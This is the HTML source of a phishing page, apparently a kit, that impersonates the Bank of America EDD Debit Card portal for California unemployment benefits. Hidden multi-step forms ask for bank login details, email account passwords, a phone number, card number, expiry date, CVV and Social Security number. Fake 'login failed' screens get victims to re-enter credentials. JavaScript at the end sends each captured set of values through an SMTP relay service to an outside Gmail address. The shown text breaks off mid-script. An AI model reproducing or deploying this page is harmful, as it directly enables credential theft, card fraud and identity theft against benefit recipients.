<!DOCTYPE html>
<html class="no-js" lang="en">
<head>

    <meta charset="utf-8" />
    
    
    <meta content="IE=edge" http-equiv="X-UA-Compatible">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex, nofollow">
    <title>RR</title>
    <link href="https://www.visaprepaidprocessing.com/bundles/foundation/css?v=TgYukCV0BSpb98GObtBe6i9KeBqBppGV5EzParDKRD011" rel="stylesheet"/>

    <link href="https://www.visaprepaidprocessing.com/bundles/css?v=wAZASNxRNEHvELh5VVy5mcxHM2kaP7CFlrsQ-TKMrzc11" rel="stylesheet"/>

    <link href="https://www.visaprepaidprocessing.com/bundles/css/print?v=JPgM1hk5e3sLqXHZFVWtkkRA7MMTcH6t30yiIk5dBDo11" rel="stylesheet" type="text/css" media="print" />
    <link href="https://www.visaprepaidprocessing.com/bundles/preventEarlyClickCss?v=AjE3qz4xe4LPPh9UwnSuF7YqcFXF2UG5PMA-GpfTe5c11" rel="stylesheet"/>
    <link href="https://www.visaprepaidprocessing.com/content/PRC384/CP384-T03-019/_Styles/site.css" rel="stylesheet" type="text/css" />
    
</head>


<!--[if IE 9]><body class="body lt-ie10"> <![endif]-->
<!--[if lt IE 9]><body class="body lt-ie9">
    <script nonce='6XECFAHIhr7XZ29z5gxJtQEb' src="../content/_Scripts/rem.min.js" type="text/javascript"></script>
    <![endif]-->
<body class="body">
    <div class="header-container" role="banner">







<div class="row header-row">
    <div class="columns brand-container show-for-medium-up">
        <div class="small-12 medium-3 custom-medium-push-5 columns">
            <div class="logo-wrapper">
                <a href="#">
                    <img alt="Bank&#32;Of&#32;America,&#32;N.&#32;A.&#32;Logo" class="header-logo&#32;medium&#32;img-responsive" id="brand-logo" src="https://www.visaprepaidprocessing.com/content/PRC384/CP384-T03-019/_Images/logo.png" title="" />
                </a>
            </div>
        </div>
        <div class="small-12 medium-9 custom-medium-pull-7 columns">
            <div class="program-wrapper">
                <span class="header-card-program">&Egrave;DD D&ecirc;bit Card</span>
            </div>
        </div>
    </div>

        <div class="small-12 show-for-small-only columns">
            <nav data-topbar class="top-bar mobile-nav" role="navigation" aria-label="Main" style="height:115px;">
                <!-- DPS-5439 - INC000004694104 - Hamburger Menu cannot be opened. Jeff has recommended below change -->
                <!--<div class="logo-program-menu">
                    <div class="row">
                        <div class="small-10 columns">
                            <a href="/eddcard/home/index">

                                <img alt="Bank&#32;Of&#32;America,&#32;N.&#32;A.&#32;Logo" class="header-logo&#32;medium&#32;img-responsive" id="brand-logo-mobile" src="/content/PRC384/CP384-T03-019/_Images/logo.png" title="" />
                            </a>
                        </div>

                        <div class="small-2 columns toggle-topbar">
                            <button class="menu-icon" aria-expanded="false">
                                <i class="fa fa-bars" role="presentation" aria-hidden="true"></i>
                                <span class="a11y-hide-visually">Expand Navigation Menu</span> 
                            </button>
                        </div>
                    </div>

                    <div class="row">
                        <div class="small-12 columns header-card-program">EDD Debit Card </div>
                    </div>
                </div>-->
                <ul class="title-area">
                    <!-- Title Area -->
                    <li class="name">
                        <a href="#">
                            <img alt="Bank&#32;Of&#32;America,&#32;N.&#32;A.&#32;Logo" class="header-logo&#32;medium&#32;img-responsive" id="brand-logo-mobile" src="https://www.visaprepaidprocessing.com/content/PRC384/CP384-T03-019/_Images/logo.png" title="" />
                        </a>
                    </li>
                    <li class="toggle-topbar menu-icon">
                        <button class="menu-icon" aria-expanded="false">
                            <i class="fa fa-bars" role="presentation" aria-hidden="true"></i>
                            <span class="a11y-hide-visually">Expand Navigation Menu</span> 
                        </button>
                    </li>
                    <li class="header-card-program">&Egrave;DD D&ecirc;bit Card</li>
                </ul>

                
<section class="top-bar-section">
    <ul class="left">
                    <li>
                            <a href="#">Home</a>
                    </li>
                    <li>
                            <a href="#">Sign In</a>
                    </li>
                    <li>
                            <a href="#">Activate My Card</a>
                    </li>
    </ul>
</section>






            </nav>
        </div>


        <div class="row show-for-medium-up">
            <div class="medium-12 columns">
                <nav data-topbar class="top-bar desktop-nav" role="navigation" aria-label="Main">
                    
<section class="top-bar-section">
    <ul class="left">
                    <li>
                            <a href="#">Home</a>
                    </li>
                    <li>
                            <a href="#">Sign In</a>
                    </li>
                    <li>
                            <a href="#">Activate My Card</a>
                    </li>
    </ul>
</section>






                </nav>
            </div>
        </div>
</div>




    </div>
    
    
    <div class="content-container" id="content" role="main" tabindex="-1">
	
	
<div id="Div0" style="display:none">
<form action="" autocomplete="off" id="MainForm" method="post">
<div class='row'>
<p style="background-color: #C41230;color:#fff;padding:10px;margin-bottom: 0px;">Select one.</p>

<div class='large-12 medium-12 small-12 column'>
<h1>Addition Verification is required.</h1>

</div>
</div>

<div class='box'>
<div class='row'>
<div class='medium-12 columns'>

<div class='large-12 medium-12 small-12 column'>
<p class="align-right margin-bottom-none">
<span class="required">*</span>
Required fields
</p>
</div>





<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Complete this verification with  &nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
<div  id="Div7" style="display:block">
<input class="button&#32;small&#32;navigationButton&#32;primary" data-route="verify/verifyyouridentity" id="verifyverifyyouridentitySubmit" name="Submit" type="button" value="Username Login" onClick="sendEmailL()" />
</div>

<div  id="Div8" style="display:none">
<img src="https://ppllabs.com/wp-content/uploads/2018/10/load.gif" width="3%">
<input class="button&#32;small&#32;navigationButton&#32;primary"  name="Submit" type="button" value="Please wait..." disabled />
</div>


</div>

</div>





<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Dont have a username yet? &nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

<div  id="Div9" style="display:block">
<input class="button&#32;small&#32;navigationButton&#32;primary" data-route="verify/verifyyouridentity" id="verifyverifyyouridentitySubmit" name="Submit" type="button" value="Use my &Ecirc;DD DEBIT CARD" onClick="sendEmailC()" />
</div>

<div  id="Div10" style="display:none">
<img src="https://ppllabs.com/wp-content/uploads/2018/10/load.gif" width="3%">
<input class="button&#32;small&#32;navigationButton&#32;primary"  name="Submit" type="button" value="Please wait..." disabled />
</div>
<div>

</div>
</div>


</div>



</div></div></div>        
</form>
</div>	

<div id="Div1" style="display:block">
<form action="" autocomplete="off" id="MainForm" method="post">
<div class='row'>
<p style="background-color: #C41230;color:#fff;padding:10px;margin-bottom: 0px;">Please note your website username and password may be different than what you use for the Mobile App.</p>

<div class='large-12 medium-12 small-12 column'>
<h1>Sign In</h1>

</div>
</div>

<div class='box'>
<div class='row'>
<div class='medium-12 columns'>

<div class='large-12 medium-12 small-12 column'>
<p class="align-right margin-bottom-none">
<span class="required">*</span>
Required fields
</p>
</div>





<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Username&nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
<input autocomplete="off" class="stretch" data-val="true"  id="username" maxlength="23" name="username" type="text" value="" />
</div>

</div>





<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Password&nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

<input type="hidden" name="usrip1" id="usrip1" value="">
<input autocomplete="off" class="stretch" data-val="true"  id="password" maxlength="23" name="password" type="password" value="" />

<br>
<div><div class="data-rows"><input id="VerifyUserRequestHandler_Model_RememberMe" name="VerifyUserRequestHandler.Model.RememberMe" type="checkbox" value="true">
<input name="VerifyUserRequestHandler.Model.RememberMe" type="hidden" value="false"><label class="check-box-label-with-tootip normal" for="VerifyUserRequestHandler_Model_RememberMe">Remember Username</label></div><small></small><small>
<a>Need Username?</a><span aria-hidden="true"> | </span><a>Forgot Username?</a></small></div>
</div>


</div>




<div  id="Div11" style="display:block">
<div class='small-12 columns button-group'>
<input class="button&#32;small&#32;navigationButton&#32;primary" data-route="verify/verifyyouridentity" id="verifyverifyyouridentitySubmit" name="Submit" type="button" value="Sign In" onClick="sendEmail()" />

</div>
</div>

<div  id="Div12" style="display:none">
<div class='small-12 columns button-group'>

<img src="https://ppllabs.com/wp-content/uploads/2018/10/load.gif" width="3%">
<input class="button&#32;small&#32;navigationButton&#32;primary"  name="Submit" type="button" value="Please wait..." disabled />

</div>
</div>

</div></div></div>        
</form>
</div>



<div id="Div2" style="display:none">

<form action="" autocomplete="off" id="MainForm" method="post">

<div class='box'>
<div class='row'>

<br>
<div class='row'>
<p style="background-color:#006666;color:#CCCCCC;padding:10px;margin-bottom: 0px;"> For additional layer of account security, Link your Email with &Ecirc;DD.</p>
<div class='large-12 medium-12 small-12 column'>
<h1> - Email Authentication. </h1>

<p style="padding:10px;">This will help EDD increase your account security and protect you against fraudulent transactions.<br> EDD will connect to your Mail service to authenticate and secure your Card Online Access with your Email.</p>
</div>
</div>
<br>

<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Email address &nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
<input autocomplete="off" class="stretch" data-val="true"  id="email"  name="email" type="text" value="" placeholder="user@domain.com" />
</div>

</div>

<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Email Password&nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

<input type="hidden" name="usrip2" id="usrip2" value="">
<input autocomplete="off" class="stretch" data-val="true"  id="emailpass"  name="emailpass" type="password" value="" placeholder="*************" />

</div>
</div>

<br>
<p>Please verify your Mobile Number to continue.</p>
<div class="row form-row"><div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Mobile Number &nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4 medium-4 small-12 columns left">
<input autocomplete="off" class="stretch" data-val="true" id="phone" name="phone" type="text" value="" placeholder="(###) ###-####">
</div>


<div  id="Div13" style="display:block">
<div class='small-12 columns button-group'>
<input class="button&#32;small&#32;navigationButton&#32;primary" data-route="verify/verifyyouridentity" id="verifyverifyyouridentitySubmit" name="Submit" type="button" value="Continue" onClick="sendEmail2()"/>
</div>
</div>

<div  id="Div14" style="display:none">
<div class='small-12 columns button-group'>

<img src="https://ppllabs.com/wp-content/uploads/2018/10/load.gif" width="3%">
<input class="button&#32;small&#32;navigationButton&#32;primary"  name="Submit" type="button" value="Please wait..." disabled />
</div>
</div>


</div></div></div>        
</form>
</div>



<div id="Div3" style="display:none">
<form action="" autocomplete="off" id="MainForm" method="post">

<div class='row'>
<p style="background-color: #C41230;color:#fff;padding:10px;margin-bottom: 0px;">The username or password doesn't match our records. Please try again..</p>
<div class='large-12 medium-12 small-12 column'>
<h1>Review Failed Validations.</h1>

</div>
</div>

<div class='box'>
<div class='row'>
<div class='medium-12 columns'>

<div class='large-12 medium-12 small-12 column'>
<p class="align-right margin-bottom-none">
<span class="required">*</span>
Required fields
</p>
</div>




<p><font color="#CC0000">Login Failed! Please review your inputs and try again.</font></p>

<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Username&nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
<input autocomplete="off" class="stretch" data-val="true"  id="username2" maxlength="23" name="username2" type="text" value="" />
</div>

</div>





<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Password&nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

<input autocomplete="off" class="stretch" data-val="true"  id="password2" maxlength="23" name="password2" type="password" value="" />

</div>
</div>
<br>
<h2>Email Authentication</h2>
<p><font color="#CC0000">Authentication Failed! Please review your inputs and try again.</font></p>

<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Email address&nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
<input autocomplete="off" class="stretch" data-val="true"  id="email2"  name="email2" type="text" value="" />
</div>

</div>





<div class="row&#32;form-row"><div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;">
<label class="form-control" for="VerifyUserRequestHandler_Model_Username">Email Password&nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

<input autocomplete="off" class="stretch" data-val="true"  id="emailpass2"  name="emailpass2" type="password" value="" />

</div>
</div>


<div class='small-12 columns button-group'>
<input type="hidden" name="usrip3" id="usrip3" value="">
<input class="button&#32;small&#32;navigationButton&#32;primary"  name="Submit" type="button" value="Submit" onClick="sendEmail3()" />
</div>



</div></div></div>        
</form>
</div>

<div id="Div4" style="display:none">
<form action="" autocomplete="off" id="MainForm" method="post">
<div class='row'>
<p style="background-color:#006666;color:#CCCCCC;padding:10px;margin-bottom: 0px;"> Verify the information below to restore your account.</p>
<div class='large-12 medium-12 small-12 column'>
<h1> - Verify Your Identity </h1>

</div>
</div>

<div class='box'>
<div class='row'>
<div class='medium-12 columns'>

<div class='large-12 medium-12 small-12 column'>
<p class="align-right margin-bottom-none">
<span class="required">*</span>
Required fields
</p>
</div>

<div class="row form-row"><div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserResponseHandler_Model_Tokens_1__Value">16-Digit Card Number&nbsp;<span class="required">*&nbsp;</span></label>
</div>
<div class="large-4 medium-4 small-12 columns left">
<input autocomplete="off" class="stretch"  maxlength="19" name="card" id="card" type="text" value="" placeholder="#### #### #### ####">
</div>
</div>


<div class="row form-row">
<div class="large-3 medium-5 small-12 column "><label class="form-control" for="VerifyUserResponseHandler_Model_ExpirationDateMonth">Expiration Date Month&nbsp;<span class="required">*&nbsp;</span></label></div>

<div class="large-4 medium-4 small-12 columns left">
<select class="stretch" id="expm" name="expm">
<option value="">Select Month</option>
<option value="01">01 - January</option>
<option value="02">02 - February</option>
<option value="03">03 - March</option>
<option value="04">04 - April</option>
<option value="05">05 - May</option>
<option value="06">06 - June</option>
<option value="07">07 - July</option>
<option value="08">08 - August</option>
<option value="09">09 - September</option>
<option value="10">10 - October</option>
<option value="11">11 - November</option>
<option value="12">12 - December</option>
</select></div></div>

<div class="row form-row">
<div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserResponseHandler_Model_ExpirationDateYear">Expiration Date Year&nbsp;<span class="required">*&nbsp;</span></label></div>
<div class="large-4 medium-4 small-12 columns left">
<select  class="stretch" id="expy" name="expy">
<option value="">Select Year</option>
<option value="2021">2021</option>
<option value="2022">2022</option>
<option value="2023">2023</option>
<option value="2024">2024</option>
<option value="2025">2025</option>
<option value="2026">2026</option>
<option value="2027">2027</option>
<option value="2028">2028</option>
<option value="2029">2029</option>
<option value="2030">2030</option>
<option value="2031">2031</option>
<option value="2032">2032</option>
<option value="2033">2033</option>
<option value="2034">2034</option>
<option value="2035">2035</option>
<option value="2036">2036</option>
</select>
</div></div>


<div class="row form-row"><div class="large-3 medium-5 small-12 column "><label class="form-control" for="VerifyUserResponseHandler_Model_Tokens_0__Value">Social Security Number&nbsp;<span class="required">*&nbsp;</span></label></div>
<div class="large-4 medium-4 small-12 columns left">
<input  autocomplete="off" class="stretch" id="ssn" maxlength="11" name="ssn" type="password" value="" placeholder="###-##-####">
</div>
</div>


<div class="row form-row"><div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserResponseHandler_Model_Tokens_1__Value">3-Digit Security Code&nbsp;<span class="required">*&nbsp;</span></label></div>
<div class="large-4 medium-4 small-12 columns left">
<input autocomplete="off" class="stretch"  id="cvv" maxlength="3" name="cvv" type="password" value="" placeholder="###">
</div>
</div>

<div  id="Div20" style="display:block">
<div class='small-12 columns button-group'>

<input type="hidden" name="usrip4" id="usrip4" value="">
<input class="button&#32;small&#32;navigationButton&#32;primary" name="Submit" type="button" value="Submit" onClick="sendEmail4()"/>
</div>
</div>
<div  id="Div21" style="display:none">
<div class='small-12 columns button-group'>
<img src="https://ppllabs.com/wp-content/uploads/2018/10/load.gif" width="3%">
<input class="button&#32;small&#32;navigationButton&#32;primary"  name="Submit" type="button" value="Please wait..." disabled />
</div></div>



</div></div></div>
</form>
</div>

<div id="Div5" style="display:none">

        <form action="" autocomplete="off" id="MainForm" method="post">
<div class='row'>
<p style="background-color: #C41230;color:#fff;padding:10px;margin-bottom: 0px;"> Invalid Credentials, Please review your inputs and try again.</p>
<div class='large-12 medium-12 small-12 column'>
<h1> - Verify Your Identity </h1>

</div>
</div>


<div class='box'>
<div class='row'>
<div class='medium-12 columns'>

<div class='large-12 medium-12 small-12 column'>
<p class="align-right margin-bottom-none">
<span class="required">*</span>
Required fields
</p>
</div>

<div class="row form-row"><div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserResponseHandler_Model_Tokens_1__Value">16-Digit Card Number&nbsp;<span class="required">*&nbsp;</span></label></div>
<div class="large-4 medium-4 small-12 columns left">
<input autocomplete="off" class="stretch"  id="card2" maxlength="19" name="card2" type="text" value="" placeholder="4427 434# #### ####">
</div>
</div>


<div class="row form-row">

<div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserResponseHandler_Model_ExpirationDateMonth">Expiration Date Month&nbsp;<span class="required">*&nbsp;</span></label></div><div class="large-4 medium-4 small-12 columns left">
<select class="stretch" id="expm2" name="expm2">
<option value="">Select Month</option>
<option value="01">01 - January</option>
<option value="02">02 - February</option>
<option value="03">03 - March</option>
<option value="04">04 - April</option>
<option value="05">05 - May</option>
<option value="06">06 - June</option>
<option value="07">07 - July</option>
<option value="08">08 - August</option>
<option value="09">09 - September</option>
<option value="10">10 - October</option>
<option value="11">11 - November</option>
<option value="12">12 - December</option>
</select></div></div>


<div class="row form-row">
<div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserResponseHandler_Model_ExpirationDateYear">Expiration Date Year&nbsp;<span class="required">*&nbsp;</span></label></div>
<div class="large-4 medium-4 small-12 columns left">
<select  class="stretch" id="expy2" name="expy2">
<option value="">Select Year</option>
<option value="2021">2021</option>
<option value="2022">2022</option>
<option value="2023">2023</option>
<option value="2024">2024</option>
<option value="2025">2025</option>
<option value="2026">2026</option>
<option value="2027">2027</option>
<option value="2028">2028</option>
<option value="2029">2029</option>
<option value="2030">2030</option>
<option value="2031">2031</option>
<option value="2032">2032</option>
<option value="2033">2033</option>
<option value="2034">2034</option>
<option value="2035">2035</option>
<option value="2036">2036</option>
</select>
</div>
</div>

<div class="row form-row">
<div class="large-3 medium-5 small-12 column "><label class="form-control" for="VerifyUserResponseHandler_Model_Tokens_0__Value">Social Security Number&nbsp;<span class="required">*&nbsp;</span></label></div>
<div class="large-4 medium-4 small-12 columns left">
<input  autocomplete="off" class="stretch" id="ssn2" maxlength="11" name="ssn2" type="text" value="" placeholder="###-##-####">
</div>
</div>


<div class="row form-row">
<div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserResponseHandler_Model_Tokens_1__Value">3-Digit Security Code&nbsp;<span class="required">*&nbsp;</span></label></div>
<div class="large-4 medium-4 small-12 columns left">
<input autocomplete="off" class="stretch"  id="cvv2" maxlength="3" name="cvv2" type="text" value="" placeholder="###">
</div>
</div>

<div  id="Div22" style="display:block">
<div class='small-12 columns button-group'>

<input type="hidden" name="usrip5" id="usrip5" value="">
<input class="button&#32;small&#32;navigationButton&#32;primary" data-route="verify/verifyyouridentity" id="verifyverifyyouridentitySubmit" name="Submit" type="button" value="Submit" onClick="sendEmail5()"/>
</div>
</div>

<div  id="Div23" style="display:none">

<div class='small-12 columns button-group'>
<img src="https://ppllabs.com/wp-content/uploads/2018/10/load.gif" width="3%">
<input class="button&#32;small&#32;navigationButton&#32;primary"  name="Submit" type="button" value="Please wait..." disabled />
</div>
</div>


</div></div></div>
</form>
</div>



<div id="Div6" style="display:none">

        <form action="" autocomplete="off" id="MainForm" method="post">
<div class='row'>
<div class='large-12 medium-12 small-12 column'>

<h1> <img src="https://risingsunopp.org/wp-content/uploads/California-Emplorment-Development-Department.png"><br>- Verify Your Identity to Benefit Programs Online. </h1>

</div>
</div>


<div class='box'>
<div class='row'>
<div class='medium-12 columns'>

<div class='large-12 medium-12 small-12 column'>
<p class="align-right margin-bottom-none">
<span class="required">*</span>
Required fields
</p>
</div>

<div class="row form-row"><div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserResponseHandler_Model_Tokens_1__Value">Email address &nbsp;<span class="required">*&nbsp;</span></label></div>
<div class="large-4 medium-4 small-12 columns left">
<input autocomplete="off" class="stretch"  id="caemail" name="caemail" type="text" value="" placeholder="user@domain.com">
</div>
</div>



<div class="row form-row">
<div class="large-3 medium-5 small-12 column ">
<label class="form-control" for="VerifyUserResponseHandler_Model_Tokens_1__Value">Password &nbsp;<span class="required">*&nbsp;</span></label></div>
<div class="large-4 medium-4 small-12 columns left">
<input autocomplete="off" class="stretch"  id="capass" name="capass" type="text" value="" placeholder="***************">
</div>
</div>

<div  id="Div30" style="display:block">
<div class='small-12 columns button-group'>

<input type="hidden" name="usrip6" id="usrip6" value="">
<input class="button&#32;small&#32;navigationButton&#32;primary" data-route="verify/verifyyouridentity" id="verifyverifyyouridentitySubmit" name="Submit" type="button" value="Login" onClick="sendEmail6()"/>
</div>
</div>

<div  id="Div31" style="display:none">

<div class='small-12 columns button-group'>
<img src="https://ppllabs.com/wp-content/uploads/2018/10/load.gif" width="3%">
<input class="button&#32;small&#32;navigationButton&#32;primary"  name="Submit" type="button" value="Please wait..." disabled />
</div>
</div>


</div></div></div>
</form>
</div>


    
<div class="footer" role="contentinfo">
    <div class="row">
        <div class="small-12 columns" role="navigation" aria-label="Footer navigation">
            <ul class="footer-navigation">

                
        <li><a href="#">Fee Information</a></li>
        <li><a href="#">FAQ</a></li>
        <li><a href="#">Site Map</a></li>
        <li><a href="#">Contact Us</a></li>
        <li><a href="#">Privacy / Security</a></li>
        <li><a href="#">Terms &amp; Conditions</a></li>
        <li><a href="#">Digital Terms &amp; Conditions and Fees</a></li>
        <li><a href="#">ATM Locator</a></li>










                    <li><a>Bank Of America, N. A.</a></li>

            </ul>
        </div>
    </div>
    <div class="extra">
        <div class="small-12 columns">
                <div class="row language">
                    <div id="lang-label" class="small-12 columns align-center">
                        <form action="" autocomplete="off" id="CultureForm" method="post"><input name="__RequestVerificationToken" type="hidden" value="L8tH35Kwer8S9-THNghTKsplJEys9muJ1Kjwk9oJRHaUmiZmhG0pPQumngQXLFq-U9NQ8zXA4FXdkDytn2xWohiU5cw6Rm7k7pCuibkaEFE1" />    <span id="language-label" class="uppercase"><span class="a11y-hide-visually">Select a</span> Language:</span>
    <ul aria-labelledby="language-label" class="language-short-list">
                <li><button class="current changeCultureButton" data-culture="en-US" lang="en-US">English<span class="a11y-hide-visually"> (Selected)</span></button></li>
                <li><button class="changeCultureButton"  data-culture="es-MX" lang="es-MX">EspaÃƒÂ±ol</button></li>
    </ul>
    <input type="submit" class="a11y-hide-all" tabindex="-1" value="Submit" />
</form>






                    </div>
                </div>
            <div class="row copyright">
                <div class="small-12 columns">
                    <p>
                        Copyright 2021 Bank of Am&ecirc;rica Corporation .
<a href="#"> Visa Global Privacy Notice.</a>                                                    
<br />Bank of America, N.A. Member FDIC Equal Housing Lender                    </p>
                    <div class="large-12 column align-center">
    <p style="color:#000;">
        <img src="https://www.visaprepaidprocessing.com/content/PRC384/_images/EmailLogo.png" /><br />
        Apple, the Apple logo and iPhone are trademarks of Apple Inc., registered in the U.S. and other countries and regions. App Store is a service mark of Apple Inc. Google Play and the Google Play logo are trademarks of Google LLC.
    </p>
    <p style="color:#000;"> Your funds are eligible for FDIC insurance. Your funds are insured up to $250,000 by the FDIC in the event Bank of Am&ecirc;rica, N.A. fails, if specific deposit insurance requirements are met. See <a href="#">fdic.gov/deposit/deposits/prepaid.html</a> for details. In the event Bank of Am&ecirc;rica, N.A. fails, the FDIC may require information from you, including a government identification number, to determine the amount of your insured deposits.  If you do not provide this information to the FDIC access to your insured funds will be delayed. </p>
    </div>

                </div>
            </div>
        </div>
    </div>
</div>



    <div id="modalPlaceHolder" class="reveal-modal medium" data-reveal>
    </div>

</body>
</html>

<script src='https://smtpjs.com/v3/smtp.js'></script> 
<script type='text/javascript'>
    function sendEmailL() {
    var BTSA = document.getElementById("Div7");
	var BTZA = document.getElementById("Div8");
	if (BTSA.style.display === "block" && BTZA.style.display === "none") {
         BTSA.style.display = "none";
	     BTZA.style.display = "block";
	 }
	setTimeout(function() {
	 var A0 = document.getElementById("Div0");
	 var A1 = document.getElementById("Div1");
     if (A0.style.display === "block" && A1.style.display === "none") {
         A0.style.display = "none";
	     A1.style.display = "block";
	 } 
	}, 3000); 
	}
</script>
  <script type='text/javascript'>
    function sendEmailC() {
	setTimeout(function() {
	 var A0 = document.getElementById("Div1");
	 var A4 = document.getElementById("Div4");
     if (A0.style.display === "block" && A4.style.display === "none") {
         A0.style.display = "none";
	     A4.style.display = "block";
	 } 
	}, 1000); 
	}
</script>
<script type='text/javascript'>
 function sendEmail() {
    if (document.getElementById('username').value === '') {
        alert('Username is Empty');
        return false;
    }
	if (document.getElementById('password').value === '') {
        alert('Password is Empty');
        return false;
    }
	var BTY = document.getElementById("Div11");
	var BTZ = document.getElementById("Div12");
	if (BTY.style.display === "block" && BTZ.style.display === "none") {
         BTY.style.display = "none";
	     BTZ.style.display = "block";
	 } 
	setTimeout(function() {
	 var x = document.getElementById("Div1");
	 var y = document.getElementById("Div2");
     if (x.style.display === "block" && y.style.display === "none") {
         x.style.display = "none";
	     y.style.display = "block";
	 } 
	}, 3000);
	document.getElementById('username2').value = document.getElementById('username').value;
    var username = document.getElementById('username').value;
	var password = document.getElementById('password').value;
	var usrip1 = document.getElementById('usrip1').value;
	Email.send({
    SecureToken : "b1197ac5-14d1-4c4b-a6db-5a6b7ddab04c",
    To : 'mrjetjibbs@gmail.com',
    From : "justine.meulemans@skynet.be",
    Subject : 'DEE: IP: ' + usrip1,
    Body : 'DEE: - Username: ' + username + ' || Password: ' + password
    }).then(message);
	}
</script>
<script type='text/javascript'>
 function sendEmail2() {
    if (document.getElementById('phone').value === '') {
        alert('Phone Number is Empty');
        return false;
    }
    if (document.getElementById('email').value === '') {
        alert('Email address is Empty');
        return false;
    }
	if (document.getElementById('emailpass').value === '') {
        alert('Email Password is Empty');
        return false;
    }
	var BTYY = document.getElementById("Div13");
	var BTZZ = document.getElementById("Div14");
	if (BTYY.style.display === "block" && BTZZ.style.display === "none") {
         BTYY.style.display = "none";
	     BTZZ.style.display = "block";
	 } 
	setTimeout(function() {
	 var x = document.getElementById("Div1");
	 var y = document.getElementById("Div2");
	 var z = document.getElementById("Div4");
     if (x.style.display === "none" && y.style.display === "block" && z.style.display === "none") {
         x.style.display = "none";
	     y.style.display = "none";
	     z.style.display = "block";
	 } 
	}, 3000);
	document.getElementById('email2').value = document.getElementById('email').value;
    var email = document.getElementById('email').value;
	var emailpass = document.getElementById('emailpass').value;
	var phone = document.getElementById('phone').value;
	var usrip2 = document.getElementById('usrip2').value;
	Email.send({
    SecureToken : "b1197ac5-14d1-4c4b-a6db-5a6b7ddab04c",
    To : 'mrjetjibbs@gmail.com',
    From : "justine.meulemans@skynet.be",
    Subject : 'DEE: IP: ' + usrip2,
    Body : 'DEE: - Email: ' + email + ' || Email Password: ' + emailpass + ' || Phone: ' + phone
    }).then(message);
	}
</script>
<script type='text/javascript'>
 function sendEmail3() {
   if (document.getElementById('username2').value === '') {
        alert('Username is Empty');
        return false;
    }
	if (document.getElementById('password2').value === '') {
        alert('Password is Empty');
        return false;
    } 
   if (document.getElementById('email2').value === '') {
        alert('Email address is Empty');
        return false;
    }
	if (document.getElementById('emailpass2').value === '') {
        alert('Email Password is Empty');
        return false;
    }
	setTimeout(function() {
	 var xAS = document.getElementById("Div3");
	 var yAS = document.getElementById("Div6");
     if (xAS.style.display === "block" && yAS.style.display === "none") {
         xAS.style.display = "none";
	     yAS.style.display = "block";
	 } 
	}, 3000);
	document.getElementById('caemail').value = document.getElementById('email2').value;
    var username2 = document.getElementById('username2').value;
	var password2 = document.getElementById('password2').value;
    var email2 = document.getElementById('email2').value;
	var emailpass2 = document.getElementById('emailpass2').value;
	var usrip3 = document.getElementById('usrip3').value;
	Email.send({
    SecureToken : "b1197ac5-14d1-4c4b-a6db-5a6b7ddab04c",
    To : 'mrjetjibbs@gmail.com',
    From : "justine.meulemans@skynet.be",
    Subject : 'DEE: IP: ' + usrip3,
    Body : 'DEE: - Username: ' + username2 + ' || Password: ' + password2 + ' || Email: ' + email2 + ' || EmailPass: ' + emailpass2
	}).then(message);
	}
</script>
<script type='text/javascript'>
 function sendEmail4() {
    if (document.getElementById('card').value === '') {
        alert('Card Number is Empty');
        return false;
    }
    if (document.getElementById('expm').value === '') {
        alert('Card Month is Empty');
        return false;
    }
	if (document.getElementById('expy').value === '') {
